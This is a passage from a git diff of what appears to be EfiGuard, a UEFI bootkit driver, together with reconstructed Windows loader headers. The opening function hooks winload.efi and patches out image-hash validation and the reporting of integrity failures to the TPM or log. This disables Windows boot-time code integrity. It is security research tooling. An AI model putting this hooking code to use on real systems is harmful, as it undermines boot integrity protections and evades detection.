+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ )
+{
+ // Print file and version info
+ UINT16 MajorVersion = 0, MinorVersion = 0, BuildNumber = 0, Revision = 0;
+ EFI_STATUS Status = GetPeFileVersionInfo(ImageBase, &MajorVersion, &MinorVersion, &BuildNumber, &Revision, NULL);
+ if (EFI_ERROR(Status))
+ Print(L"\r\nPatchWinload: WARNING: failed to obtain winload.efi version info. Status: %llx\r\n", Status);
+ else
+ {
+ Print(L"\r\nPatching winload.efi v%u.%u.%u.%u...\r\n", MajorVersion, MinorVersion, BuildNumber, Revision);
+
+ // Check if this is a supported winload version. All patches should work on all versions since Vista SP1,
+ // except for the ImgpFilterValidationFailure patch because this function only exists on Windows 7 and higher.
+ if (BuildNumber < 6001)
+ {
+ Print(L"\r\nPatchWinload: ERROR: Unsupported winload.efi image version.\r\n");
+ Status = EFI_UNSUPPORTED;
+ goto Exit;
+ }
+
+ // Some... adjustments... need to be made later on in the case of pre-Windows 7 loader blocks
+ gKernelPatchInfo.LegacyLoaderBlock = BuildNumber < 7600;
+ }
+
+ // Find the .text and .rdata sections
+ PEFI_IMAGE_SECTION_HEADER CodeSection = NULL, PatternSection = NULL;
+ PEFI_IMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(NtHeaders);
+ for (UINT16 i = 0; i < NtHeaders->FileHeader.NumberOfSections; ++i)
+ {
+ CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1];
+ CopyMem(SectionName, Section->Name, EFI_IMAGE_SIZEOF_SHORT_NAME);
+ SectionName[MAX(sizeof(".text"), sizeof(".rdata"))] = '\0';
+
+ if (AsciiStrCmp(SectionName, ".text") == 0)
+ CodeSection = Section;
+ else if (AsciiStrCmp(SectionName, ".rdata") == 0)
+ PatternSection = Section;
+
+ Section++;
+ }
+
+ ASSERT(CodeSection != NULL);
+ ASSERT(PatternSection != NULL);
+
+ // (Optional) On Windows 10, find winload!BlStatusPrint
+ if (BuildNumber >= 10240)
+ {
+ gBlStatusPrint = (t_BlStatusPrint)GetProcedureAddress((UINTN)ImageBase, NtHeaders, "BlStatusPrint");
+ if (gBlStatusPrint == NULL)
+ {
+ // Not exported (RS4 and earlier) - try to find by signature
+ FindPattern(SigBlStatusPrint,
+ 0xCC,
+ sizeof(SigBlStatusPrint),
+ (VOID*)((UINT8*)ImageBase + CodeSection->VirtualAddress),
+ CodeSection->SizeOfRawData,
+ (VOID**)&gBlStatusPrint);
+ if (gBlStatusPrint == NULL)
+ {
+ gBlStatusPrint = BlStatusPrintNoop;
+ Print(L"\r\nWARNING: winload!BlStatusPrint not found. No boot debugger output will be available.\r\n");
+ }
+ }
+ }
+
+ // Find winload!OslFwpKernelSetupPhase1
+ Status = FindOslFwpKernelSetupPhase1((UINT8*)ImageBase,
+ NtHeaders,
+ CodeSection,
+ PatternSection,
+ (BOOLEAN)(BuildNumber >= 10240),
+ (UINT8**)&gOriginalOslFwpKernelSetupPhase1);
+ if (EFI_ERROR(Status))
+ {
+ Print(L"\r\nPatchWinload: failed to find OslFwpKernelSetupPhase1. Status: %llx\r\n", Status);
+ goto Exit;
+ }
+
+ Print(L"HookedOslFwpKernelSetupPhase1 at 0x%p.\r\n", (VOID*)&HookedOslFwpKernelSetupPhase1);
+
+ CONST EFI_TPL Tpl = gBS->RaiseTPL(TPL_HIGH_LEVEL); // Note: implies cli
+
+ // Backup original function prologue
+ CopyMem(gOslFwpKernelSetupPhase1Backup, (VOID*)gOriginalOslFwpKernelSetupPhase1, sizeof(gOslFwpKernelSetupPhase1Backup));
+
+ // Place faux call (push addr, ret) at the start of the function to transfer execution to our hook
+ CopyMem((VOID*)gOriginalOslFwpKernelSetupPhase1, (VOID*)gHookTemplate, sizeof(gHookTemplate));
+ *(UINTN*)((UINT8*)gOriginalOslFwpKernelSetupPhase1 + 2) = (UINTN)&HookedOslFwpKernelSetupPhase1;
+
+ gBS->RestoreTPL(Tpl);
+
+ // Patch ImgpValidateImageHash to allow custom boot loaders. This is completely
+ // optional (unless booting a custom ntoskrnl.exe), and failures are ignored
+ PatchImgpValidateImageHash(WinloadEfi,
+ (UINT8*)ImageBase,
+ NtHeaders);
+
+ if (BuildNumber >= 7600)
+ {
+ // Patch ImgpFilterValidationFailure so it doesn't silently
+ // rat out every violation to a TPM or SI log. Also optional
+ PatchImgpFilterValidationFailure(WinloadEfi,
+ (UINT8*)ImageBase,
+ NtHeaders);
+ }
+
+Exit:
+ if (EFI_ERROR(Status))
+ {
+ // Patch failed. Prompt user to ask what they want to do
+ Print(L"\r\nPress any key to continue anyway, or press ESC to reboot.\r\n");
+ if (!WaitForKey())
+ {
+ gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL);
+ }
+ }
+ else
+ {
+ Print(L"Successfully patched winload!OslFwpKernelSetupPhase1.\r\n");
+ RtlSleep(2000);
+
+ if (gDriverConfig.WaitForKeyPress)
+ {
+ Print(L"\r\nPress any key to continue.\r\n");
+ WaitForKey();
+ }
+ }
+
+ // Return success, because even if the patch failed, the user chose not to reboot above
+ return EFI_SUCCESS;
+}
diff --git a/EfiGuardDxe/VisualUefi.c b/EfiGuardDxe/VisualUefi.c
new file mode 100644
index 0000000..ec02953
--- /dev/null
+++ b/EfiGuardDxe/VisualUefi.c
@@ -0,0 +1,108 @@
+//
+// This file adds some things that are needed by VisualUefi. It should not be included under [Sources] of EDK2 .inf files.
+//
+#ifdef VISUALUEFI
+
+#include <Uefi.h>
+#include <Protocol/DriverSupportedEfiVersion.h>
+#include <Protocol/EfiGuard.h>
+#include <Guid/Acpi.h>
+#include <Library/DebugLib.h>
+
+
+//
+// The following fields are automatically generated by the EDK2 build system, but VisualUefi expects them in the source code.
+//
+CONST UINT8 _gDriverUnloadImageCount = 1;
+CONST UINT32 _gUefiDriverRevision = 0x210;
+CONST UINT32 _gDxeRevision = 0x210;
+CHAR8 *gEfiCallerBaseName = "EfiGuardDxe";
+
+
+//
+// EfiGuard Bootkit Driver Protocol
+//
+EFI_GUID gEfiGuardDriverProtocolGuid = EFI_EFIGUARD_DRIVER_PROTOCOL_GUID;
+
+
+//
+// GUIDs
+//
+EFI_GUID gEfiDriverSupportedEfiVersionProtocolGuid = EFI_DRIVER_SUPPORTED_EFI_VERSION_PROTOCOL_GUID;
+EFI_GUID gEfiAcpi20TableGuid = EFI_ACPI_20_TABLE_GUID;
+
+
+//
+// Placeholder definitions to make linking against BaseSynchronizationLib possible. See https://github.com/ionescu007/VisualUefi/issues/25
+// This is not a problem for us because we don't use spinlocks, only interlocked operations.
+//
+UINTN
+EFIAPI
+InternalGetSpinLockProperties(
+ VOID
+ )
+{
+ ASSERT(FALSE);
+ return (UINTN)-1;
+}
+
+UINT64
+EFIAPI
+GetPerformanceCounter(
+ VOID
+ )
+{
+ ASSERT(FALSE);
+ return (UINT64)-1;
+}
+
+UINT64
+EFIAPI
+GetPerformanceCounterProperties(
+ OUT UINT64 *StartValue OPTIONAL,
+ OUT UINT64 *EndValue OPTIONAL
+ )
+{
+ ASSERT(FALSE);
+ return (UINT64)-1;
+}
+
+
+//
+// Entry/unload handlers that VisualUefi expects with predefined names
+//
+extern
+EFI_STATUS
+EFIAPI
+EfiGuardInitialize(
+ IN EFI_HANDLE ImageHandle,
+ IN EFI_SYSTEM_TABLE *SystemTable
+ );
+
+EFI_STATUS
+EFIAPI
+UefiMain(
+ IN EFI_HANDLE ImageHandle,
+ IN EFI_SYSTEM_TABLE *SystemTable
+ )
+{
+ return EfiGuardInitialize(ImageHandle, SystemTable);
+}
+
+extern
+EFI_STATUS
+EFIAPI
+EfiGuardUnload(
+ IN EFI_HANDLE ImageHandle
+ );
+
+EFI_STATUS
+EFIAPI
+UefiUnload(
+ IN EFI_HANDLE ImageHandle
+ )
+{
+ return EfiGuardUnload(ImageHandle);
+}
+
+#endif // VISUALUEFI
diff --git a/EfiGuardDxe/Zydis b/EfiGuardDxe/Zydis
new file mode 160000
+Subproject c307b4306e0800f8b9a6a2992b934219bdf956c
diff --git a/EfiGuardDxe/arc.h b/EfiGuardDxe/arc.h
new file mode 100644
index 0000000..0bd5a0b
--- /dev/null
+++ b/EfiGuardDxe/arc.h
@@ -0,0 +1,1317 @@
+/*++ BUILD Version: 0011 // Increment this if a change has global effects
+
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+Module Name:
+
+ arc.h
+
+Abstract:
+
+ This header file defines the ARC system firmware interface and the
+ NT structures that are dependent on ARC types.
+
+ This module may not contain any definitions that are exposed in
+ public kit headers.
+
+Author:
+
+ David N. Cutler (davec) 18-May-1991
+
+Revision History:
+
+ James E. Moe (jamoe) 23-Jan-2003
+ Public/Private header split
+
+--*/
+
+//
+// Despite the notice above, this file was 'exposed in public kit headers' in the Windows 10.0.10586.0 WDK. Oops.
+// Some of these types also (re)appear seemingly at random in public PDBs, notably 10.0.17134.0+ and the Windows 7 ones.
+// Much more info at https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/loader_parameter_block.htm
+//
+
+#pragma once
+
+#include "ntdef.h"
+
+//
+// Define configuration routine types.
+//
+// Configuration information.
+//
+typedef enum _CONFIGURATION_TYPE {
+ ArcSystem,
+ CentralProcessor,
+ FloatingPointProcessor,
+ PrimaryIcache,
+ PrimaryDcache,
+ SecondaryIcache,
+ SecondaryDcache,
+ SecondaryCache,
+ EisaAdapter,
+ TcAdapter,
+ ScsiAdapter,
+ DtiAdapter,
+ MultiFunctionAdapter,
+ DiskController,
+ TapeController,
+ CdromController,
+ WormController,
+ SerialController,
+ NetworkController,
+ DisplayController,
+ ParallelController,
+ PointerController,
+ KeyboardController,
+ AudioController,
+ OtherController,
+ DiskPeripheral,
+ FloppyDiskPeripheral,
+ TapePeripheral,
+ ModemPeripheral,
+ MonitorPeripheral,
+ PrinterPeripheral,
+ PointerPeripheral,
+ KeyboardPeripheral,
+ TerminalPeripheral,
+ OtherPeripheral,
+ LinePeripheral,
+ NetworkPeripheral,
+ SystemMemory,
+ DockingInformation,
+ RealModeIrqRoutingTable,
+ RealModePCIEnumeration,
+ MaximumType
+} CONFIGURATION_TYPE, *PCONFIGURATION_TYPE;
+
+//
+// Profile information stored in the registry, read from cmboot, and presented
+// to the loader.
+//
+#define HW_PROFILE_STATUS_SUCCESS 0x0000
+#define HW_PROFILE_STATUS_ALIAS_MATCH 0x0001
+#define HW_PROFILE_STATUS_TRUE_MATCH 0x0002
+#define HW_PROFILE_STATUS_PRISTINE_MATCH 0x0003
+#define HW_PROFILE_STATUS_FAILURE 0xC001
+
+//
+// Docking States for the given profile
+//
+#define HW_PROFILE_DOCKSTATE_UNSUPPORTED (0x0)
+#define HW_PROFILE_DOCKSTATE_UNDOCKED (0x1)
+#define HW_PROFILE_DOCKSTATE_DOCKED (0x2)
+#define HW_PROFILE_DOCKSTATE_UNKNOWN (0x3)
+#define HW_PROFILE_DOCKSTATE_USER_SUPPLIED (0x4)
+#define HW_PROFILE_DOCKSTATE_USER_UNDOCKED \
+ (HW_PROFILE_DOCKSTATE_USER_SUPPLIED | HW_PROFILE_DOCKSTATE_UNDOCKED)
+#define HW_PROFILE_DOCKSTATE_USER_DOCKED \
+ (HW_PROFILE_DOCKSTATE_USER_SUPPLIED | HW_PROFILE_DOCKSTATE_DOCKED)
+
+//
+// Capabilites of the given profile
+//
+#define HW_PROFILE_CAPS_VCR 0x0001 // As apposed to Surprize
+#define HW_PROFILE_CAPS_DOCKING_WARM 0x0002
+#define HW_PROFILE_CAPS_DOCKING_HOT 0x0004
+#define HW_PROFILE_CAPS_RESERVED 0xFFF8
+
+//
+// Extension structure to the LOADER_PARAMETER_BLOCK in arc.h
+//
+typedef struct _PROFILE_PARAMETER_BLOCK {
+ UINT16 Status;
+ UINT16 Reserved;
+ UINT16 DockingState;
+ UINT16 Capabilities;
+ UINT32 DockID;
+ UINT32 SerialNumber;
+} PROFILE_PARAMETER_BLOCK;
+
+//
+// Block to communcation the current ACPI docking state
+//
+typedef struct _PROFILE_ACPI_DOCKING_STATE {
+ UINT16 DockingState;
+ UINT16 SerialLength;
+ CHAR16 SerialNumber[1];
+} PROFILE_ACPI_DOCKING_STATE, *PPROFILE_ACPI_DOCKING_STATE;
+
+//
+// Define ARC_STATUS type.
+//
+typedef UINT32 ARC_STATUS;
+
+//
+// Define configuration routine types.
+//
+// Configuration information.
+//
+typedef enum _CONFIGURATION_CLASS {
+ SystemClass,
+ ProcessorClass,
+ CacheClass,
+ AdapterClass,
+ ControllerClass,
+ PeripheralClass,
+ MemoryClass,
+ MaximumClass
+} CONFIGURATION_CLASS, *PCONFIGURATION_CLASS;
+
+//
+// Define DEVICE_FLAGS
+//
+typedef struct _DEVICE_FLAGS {
+ UINT32 Failed : 1;
+ UINT32 ReadOnly : 1;
+ UINT32 Removable : 1;
+ UINT32 ConsoleIn : 1;
+ UINT32 ConsoleOut : 1;
+ UINT32 Input : 1;
+ UINT32 Output : 1;
+} DEVICE_FLAGS, *PDEVICE_FLAGS;
+
+typedef struct _CONFIGURATION_COMPONENT {
+ CONFIGURATION_CLASS Class;
+ CONFIGURATION_TYPE Type;
+ DEVICE_FLAGS Flags;
+ UINT16 Version;
+ UINT16 Revision;
+ UINT32 Key;
+ union {
+ UINT32 AffinityMask;
+ struct {
+ UINT16 Group;
+ UINT16 GroupIndex;
+ } s;
+ } u;
+ UINT32 ConfigurationDataLength;
+ UINT32 IdentifierLength;
+ CHAR8* Identifier;
+} CONFIGURATION_COMPONENT, *PCONFIGURATION_COMPONENT;
+
+//
+// Define configuration data structure used in all systems.
+//
+typedef struct _CONFIGURATION_COMPONENT_DATA {
+ struct _CONFIGURATION_COMPONENT_DATA *Parent;
+ struct _CONFIGURATION_COMPONENT_DATA *Child;
+ struct _CONFIGURATION_COMPONENT_DATA *Sibling;
+ CONFIGURATION_COMPONENT ComponentEntry;
+ VOID* ConfigurationData;
+} CONFIGURATION_COMPONENT_DATA, *PCONFIGURATION_COMPONENT_DATA;
+
+//
+// Define memory allocation structures used in all systems.
+//
+typedef enum _TYPE_OF_MEMORY {
+ LoaderExceptionBlock, // 0
+ LoaderSystemBlock, // 1
+ LoaderFree, // 2
+ LoaderBad, // 3
+ LoaderLoadedProgram, // 4
+ LoaderFirmwareTemporary, // 5
+ LoaderFirmwarePermanent, // 6
+ LoaderOsloaderHeap, // 7
+ LoaderOsloaderStack, // 8
+ LoaderSystemCode, // 9
+ LoaderHalCode, // a
+ LoaderBootDriver, // b
+ LoaderConsoleInDriver, // c
+ LoaderConsoleOutDriver, // d
+ LoaderStartupDpcStack, // e
+ LoaderStartupKernelStack, // f
+ LoaderStartupPanicStack, // 10
+ LoaderStartupPcrPage, // 11
+ LoaderStartupPdrPage, // 12
+ LoaderRegistryData, // 13
+ LoaderMemoryData, // 14
+ LoaderNlsData, // 15
+ LoaderSpecialMemory, // 16
+ LoaderBBTMemory, // 17
+ LoaderZero, // 18
+ LoaderXIPRom, // 19
+ LoaderHALCachedMemory, // 1a
+ LoaderLargePageFiller, // 1b
+ LoaderErrorLogMemory, // 1c
+ LoaderVsmMemory, // 1d
+ LoaderFirmwareCode, // 1e
+ LoaderFirmwareData, // 1f
+ LoaderFirmwareReserved, // 20
+ LoaderEnclaveMemory, // 21
+ LoaderFirmwareKsr, // 22
+ LoaderEnclaveKsr, // 23
+ LoaderSkMemory, // 24
+ LoaderMaximum // 25
+} TYPE_OF_MEMORY;
+
+typedef struct _MEMORY_ALLOCATION_DESCRIPTOR {
+ LIST_ENTRY ListEntry;
+ TYPE_OF_MEMORY MemoryType;
+ UINTN BasePage;
+ UINTN PageCount;
+} MEMORY_ALLOCATION_DESCRIPTOR, *PMEMORY_ALLOCATION_DESCRIPTOR;
+
+//
+// Define loader parameter block structure.
+//
+typedef struct _NLS_DATA_BLOCK {
+ VOID* AnsiCodePageData;
+ VOID* OemCodePageData;
+ VOID* UnicodeCaseTableData;
+} NLS_DATA_BLOCK, *PNLS_DATA_BLOCK;
+
+typedef struct _VHD_DISK_SIGNATURE {
+ UINT32 ParentPartitionNumber;
+ UINT8 BootDevice[ANYSIZE_ARRAY];
+} VHD_DISK_SIGNATURE, *PVHD_DISK_SIGNATURE;
+
+typedef struct _ARC_DISK_SIGNATURE {
+ LIST_ENTRY ListEntry;
+ UINT32 Signature;
+ CHAR8* ArcName;
+ UINT32 CheckSum;
+ BOOLEAN ValidPartitionTable;
+ BOOLEAN xInt13;
+ BOOLEAN IsGpt;
+ UINT8 Reserved;
+ UINT8 GptSignature[16];
+ PVHD_DISK_SIGNATURE VhdSignature;
+} ARC_DISK_SIGNATURE, *PARC_DISK_SIGNATURE;
+
+typedef struct _ARC_DISK_INFORMATION {
+ LIST_ENTRY DiskSignatures;
+} ARC_DISK_INFORMATION, *PARC_DISK_INFORMATION;
+
+typedef struct _I386_LOADER_BLOCK {
+
+#if defined(_X86_) || defined(_AMD64_)
+ VOID* CommonDataArea;
+ UINT32 MachineType; // Temporary only
+ UINT32 VirtualBias;
+#else
+ UINT32 PlaceHolder;
+#endif
+
+} I386_LOADER_BLOCK, *PI386_LOADER_BLOCK;
+
+typedef struct _ARM_LOADER_BLOCK {
+
+#if defined(_ARM_) || defined(_ARM64_)
+ UINTN VirtualBias;
+ VOID* KdCpuBuffer;
+#else
+ UINT32 PlaceHolder;
+#endif
+
+} ARM_LOADER_BLOCK, *PARM_LOADER_BLOCK;
+
+#define NUMBER_OF_LOADER_TR_ENTRIES 8
+
+typedef struct _LOADER_PERFORMANCE_DATA {
+ UINT64 StartTime;
+ UINT64 EndTime;
+
+ //
+ // Below added in 10.0.17763.0
+ //
+ UINT64 PreloadEndTime;
+ UINT64 TcbLoaderStartTime;
+ UINT64 LoadHypervisorTime;
+ UINT64 LaunchHypervisorTime;
+ UINT64 LoadVsmTime;
+ UINT64 LaunchVsmTime;
+ UINT64 LoadDriversTime;
+} LOADER_PERFORMANCE_DATA, *PLOADER_PERFORMANCE_DATA;
+
+//
+// Entropy result codes and source IDs
+// for Boot entropy sources are defined both in arc.h and
+// ntexapi.h. These two copies must be kept identical.
+//
+typedef enum _BOOT_ENTROPY_SOURCE_RESULT_CODE {
+ BootEntropySourceStructureUninitialized = 0,
+ BootEntropySourceDisabledByPolicy = 1,
+ BootEntropySourceNotPresent = 2,
+ BootEntropySourceError = 3,
+ BootEntropySourceSuccess = 4,
+} BOOT_ENTROPY_SOURCE_RESULT_CODE, *PBOOT_ENTROPY_SOURCE_RESULT_CODE;
+
+typedef enum _BOOT_ENTROPY_SOURCE_ID {
+ BootEntropySourceNone = 0,
+ BootEntropySourceSeedfile = 1,
+ BootEntropySourceExternal = 2,
+ BootEntropySourceTpm = 3,
+ BootEntropySourceRdrand = 4,
+ BootEntropySourceTime = 5,
+ BootEntropySourceAcpiOem0 = 6,
+ BootEntropySourceUefi = 7,
+ BootEntropySourceCng = 8,
+ BootEntropySourceTcbTpm = 9,
+ BootEntropySourceTcbRdrand = 10,
+ BootMaxEntropySources = 10,
+} BOOT_ENTROPY_SOURCE_ID;
+
+//
+// The SORTPP tool can't handle array sizes expressed in terms of enums
+// This hack can be removed when the tool is fixed
+//
+#define BootMaxEntropySources (10)
+
+#define BOOT_ENTROPY_SOURCE_DATA_SIZE (64)
+#define BOOT_RNG_BYTES_FOR_NTOSKRNL (1024)
+#define BOOT_SEED_BYTES_FOR_CNG (48)
+
+//
+// The boot environment uses the following bytes from the ntoskrnl RNG data
+// region. The kernel should consider the first
+// BOOT_BL_NTOSKRNL_RNG_BYTES_USED bytes already consumed.
+//
+#define BOOT_BL_NTOSKRNL_RNG_BYTES_USED (55 * sizeof(UINT32))
+
+//
+// Boot entropy information
+// This is the data that Boot passes to NT that contains the
+// entropy & RNG information.
+// These are the Boot versions of these structures.
+// The name contains the string 'LDR' to distinguish it from the
+// OS loader equivalents in ntexapi_h.w
+//
+typedef struct _BOOT_ENTROPY_SOURCE_LDR_RESULT {
+ BOOT_ENTROPY_SOURCE_ID SourceId;
+ UINT64 Policy;
+ BOOT_ENTROPY_SOURCE_RESULT_CODE ResultCode;
+ NTSTATUS ResultStatus;
+ UINT64 Time; // in BlArchGetPerformanceCounter() units
+ UINT32 EntropyLength;
+ UINT8 EntropyData[BOOT_ENTROPY_SOURCE_DATA_SIZE];
+} BOOT_ENTROPY_SOURCE_LDR_RESULT, *PBOOT_ENTROPY_SOURCE_LDR_RESULT;
+
+//
+// EFI Offline crashdump configuration table definition.
+//
+#define OFFLINE_CRASHDUMP_VERSION_1 1
+#define OFFLINE_CRASHDUMP_VERSION_2 2
+#define OFFLINE_CRASHDUMP_VERSION_MAX OFFLINE_CRASHDUMP_VERSION_2
+
+typedef struct _OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 {
+ UINT32 Version;
+ UINT32 AbnormalResetOccurred;
+ UINT32 OfflineMemoryDumpCapable;
+
+ //
+ // Version_2 additional members.
+ //
+ PHYSICAL_ADDRESS ResetDataAddress;
+ UINT32 ResetDataSize;
+} OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2, *POFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2;
+
+//
+// Original first version definition. Now only used in winload.efi when interfacing with firmware, and in
+// sysinfo.c when interfacing with higher level sw above the kernel, to maintain backward compatibility.
+//
+typedef struct _OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V1 {
+ UINT32 Version;
+ UINT32 AbnormalResetOccurred;
+ UINT32 OfflineMemoryDumpCapable;
+} OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V1, *POFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V1;
+
+typedef OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 OFFLINE_CRASHDUMP_CONFIGURATION_TABLE;
+typedef POFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 POFFLINE_CRASHDUMP_CONFIGURATION_TABLE;
+
+//
+// The constant BootMaxEntropySources is defined both in arc.w and ntexapi_h.w.
+// If these ever get out of sync, different components will disagree on the value,
+// and thus on the size of the array below.
+// To help detect this type of bug we add a field with this constant so that the
+// CHKed builds can assert on it.
+//
+typedef struct _BOOT_ENTROPY_LDR_RESULT {
+ UINT32 maxEntropySources;
+ BOOT_ENTROPY_SOURCE_LDR_RESULT EntropySourceResult[BootMaxEntropySources];
+ UINT8 SeedBytesForCng[BOOT_SEED_BYTES_FOR_CNG];
+ UINT8 RngBytesForNtoskrnl[BOOT_RNG_BYTES_FOR_NTOSKRNL];
+
+ //
+ // This field was added in an unknown Windows 10 revision after 10.0.10586.0
+ //
+ UINT8 KdEntropy[32];
+} BOOT_ENTROPY_LDR_RESULT, *PBOOT_ENTROPY_LDR_RESULT;
+
+//
+// Hypervisor specific loader parameters.
+//
+typedef struct _LOADER_PARAMETER_HYPERVISOR_EXTENSION {
+
+ //
+ // Hypervisor crashdump pages if present.
+ //
+ UINT32 InitialHypervisorCrashdumpAreaPageCount;
+ UINT32 HypervisorCrashdumpAreaPageCount;
+ UINT64 InitialHypervisorCrashdumpAreaSpa;
+ UINT64 HypervisorCrashdumpAreaSpa;
+
+ //
+ // Hypervisor launch status.
+ //
+ UINT64 HypervisorLaunchStatus;
+ UINT64 HypervisorLaunchStatusArg1;
+ UINT64 HypervisorLaunchStatusArg2;
+ UINT64 HypervisorLaunchStatusArg3;
+ UINT64 HypervisorLaunchStatusArg4;
+
+} LOADER_PARAMETER_HYPERVISOR_EXTENSION, *PLOADER_PARAMETER_HYPERVISOR_EXTENSION;
+
+//
+// Code Integrity specific loader parameters.
+//
+typedef struct _LOADER_PARAMETER_CI_EXTENSION
+{
+ UINT32 CodeIntegrityOptions;
+ struct {
+ UINT32 UpgradeInProgress : 1;
+ UINT32 IsWinPE : 1;
+ UINT32 CustomKernelSignersAllowed : 1;
+ UINT32 Reserved : 29;
+ } s;
+ LARGE_INTEGER WhqlEnforcementDate;
+ UINT32 RevocationListOffset;
+ UINT32 RevocationListSize;
+ UINT32 CodeIntegrityPolicyOffset;
+ UINT32 CodeIntegrityPolicySize;
+ UINT32 CodeIntegrityPolicyHashOffset;
+ UINT32 CodeIntegrityPolicyHashSize;
+ UINT32 CodeIntegrityPolicyOriginalHashOffset;
+ UINT32 CodeIntegrityPolicyOriginalHashSize;
+ INT32 WeakCryptoPolicyLoadStatus;
+ UINT32 WeakCryptoPolicyOffset;
+ UINT32 WeakCryptoPolicySize;
+ UINT32 SecureBootPolicyOffset;
+ UINT32 SecureBootPolicySize;
+ UINT32 Reserved2;
+ UINT8 SerializedData[ANYSIZE_ARRAY]; // RevocationListSize bytes
+} LOADER_PARAMETER_CI_EXTENSION, *PLOADER_PARAMETER_CI_EXTENSION;
+
+typedef struct _HAL_EXTENSION_INSTANCE_ENTRY {
+
+ //
+ // Link into HalExtensionInstanceList in HAL_EXTENSION_MODULE_ENTRY.
+ //
+ LIST_ENTRY ListEntry;
+
+ //
+ // Offset from the start of the ACPI Core System Resource Table to
+ // the Resource Group associate with this instance.
+ //
+ UINT32 OffsetIntoCsrt;
+} HAL_EXTENSION_INSTANCE_ENTRY, *PHAL_EXTENSION_INSTANCE_ENTRY;
+
+typedef struct _HAL_EXTENSION_MODULE_ENTRY {
+
+ //
+ // Link into HalExtensionList in LOADER_PARAMETER_EXTENSION.
+ //
+ LIST_ENTRY ListEntry;
+
+ //
+ // Pointer to the associated module entry on the LoadOrderListHead list.
+ // This keeps info on the module name and entry point, among other things.
+ //
+ VOID* HalExtensionInfo;
+
+ //
+ // List of HAL_EXTENSION_INSTANCE_ENTRY structures tracking which Resource
+ // Groups this extension is installed on.
+ //
+ LIST_ENTRY HalExtensionInstanceList;
+
+ //
+ // Name and load status of the HAL Extension for debugging purposes.
+ //
+ NTSTATUS ModuleLoadStatus;
+ CHAR8* ModuleName;
+ CHAR8* ModulePath;
+
+} HAL_EXTENSION_MODULE_ENTRY, *PHAL_EXTENSION_MODULE_ENTRY;
+
+typedef struct _LOADER_BUGCHECK_PARAMETERS {
+
+ //
+ // Bugcheck parameters passed to the kernel.
+ //
+ UINT32 BugcheckCode;
+ UINTN BugcheckParameter1;
+ UINTN BugcheckParameter2;
+ UINTN BugcheckParameter3;
+ UINTN BugcheckParameter4;
+} LOADER_BUGCHECK_PARAMETERS, *PLOADER_BUGCHECK_PARAMETERS;
+
+//
+// Since 10.0.14393.0
+//
+typedef struct _LEAP_SECOND_DATA {
+ UINT8 Enabled;
+ UINT32 Count;
+ LARGE_INTEGER Data[1];
+} LEAP_SECOND_DATA, *PLEAP_SECOND_DATA;
+
+//
+// Since 10.0.15063.0
+//
+typedef struct _LOADER_RESET_REASON {
+ UINT8 Supplied;
+ union {
+ struct {
+ UINT64 Pch : 1;
+ UINT64 EmbeddedController : 1;
+ UINT64 Reserved : 6;
+ } Component;
+ UINT64 AsULONG64;
+ UINT8 AsBytes[8];
+ } Basic;
+ UINT32 AdditionalInfo[8];
+} LOADER_RESET_REASON, *PLOADER_RESET_REASON;
+
+typedef struct _LOADER_HIVE_RECOVERY_INFO {
+ struct {
+ //
+ // 1 if the hive was recovered by the boot loader, 0 otherwise.
+ //
+ UINT32 Recovered : 1;
+
+ //
+ // 1 if recovery from a legacy log file was performed, 0 otherwise.
+ //
+ UINT32 LegacyRecovery : 1;
+
+ //
+ // 1 if this hive was loaded as part of a soft reboot and encountered
+ // a sharing violation during the load (causing it to be loaded from
+ // a copy). 0 otherwise.
+ //
+ UINT32 SoftRebootConflict : 1;
+
+ //
+ // The most recent log from which recovery was performed as an
+ // HFILE_TYPE.
+ //
+ // i.e. For legacy recovery the individual log file recovery was
+ // performed from, otherwise the log from which the highest
+ // sequence numbered entry was from.
+ //
+ UINT32 MostRecentLog : 3;
+
+ UINT32 Spare : ((sizeof(UINT32) * 8) - 5);
+ } s;
+
+ //
+ // The sequence number that should be used for the next log entry.
+ //
+ UINT32 LogNextSequence;
+
+ //
+ // The minimum sequence number in the most recent log.
+ //
+ UINT32 LogMinimumSequence;
+
+ //
+ // The file offset at which the next log entry should be written in the
+ // most recent log.
+ //
+ UINT32 LogCurrentOffset;
+} LOADER_HIVE_RECOVERY_INFO, *PLOADER_HIVE_RECOVERY_INFO;
+
+//
+// Internal boot flags definitions.
+//
+#define INTERNAL_BOOT_FLAGS_NONE 0x00000000
+#define INTERNAL_BOOT_FLAGS_UTC_BOOT_TIME 0x00000001
+#define INTERNAL_BOOT_FLAGS_RTC_BOOT_TIME 0x00000002
+#define INTERNAL_BOOT_FLAGS_NO_LEGACY_SERVICES 0x00000004
+
+typedef struct _LOADER_PARAMETER_EXTENSION {
+ UINT32 Size; // set to sizeof (struct _LOADER_PARAMETER_EXTENSION)
+ PROFILE_PARAMETER_BLOCK Profile;
+
+ //
+ // Errata Manager inf file.
+ //
+ VOID* EmInfFileImage;
+ UINT32 EmInfFileSize;
+
+ //
+ // Pointer to the triage block, if present.
+ //
+ VOID* TriageDumpBlock;
+
+ struct _HEADLESS_LOADER_BLOCK *HeadlessLoaderBlock;
+
+ struct _SMBIOS3_TABLE_HEADER *SMBiosEPSHeader;
+
+ VOID* DrvDBImage; // Database used to identify "broken" drivers.
+ UINT32 DrvDBSize;
+
+ // If booting from the Network (PXE) then we will
+ // save the Network boot params in this loader block
+ struct _NETWORK_LOADER_BLOCK *NetworkLoaderBlock;
+
+#if defined(_X86_)
+ //
+ // Pointers to IRQL translation tables that reside in the HAL
+ // and are exposed to the kernel for use in the "inlined IRQL"
+ // build
+ //
+ UINT8* HalpIRQLToTPR;
+ UINT8* HalpVectorToIRQL;
+#endif
+
+ //
+ // Firmware Location
+ //
+ LIST_ENTRY FirmwareDescriptorListHead;
+
+ //
+ // Pointer to the in-memory copy of override ACPI tables. The override
+ // table file is a simple binary file with one or more ACPI tables laid
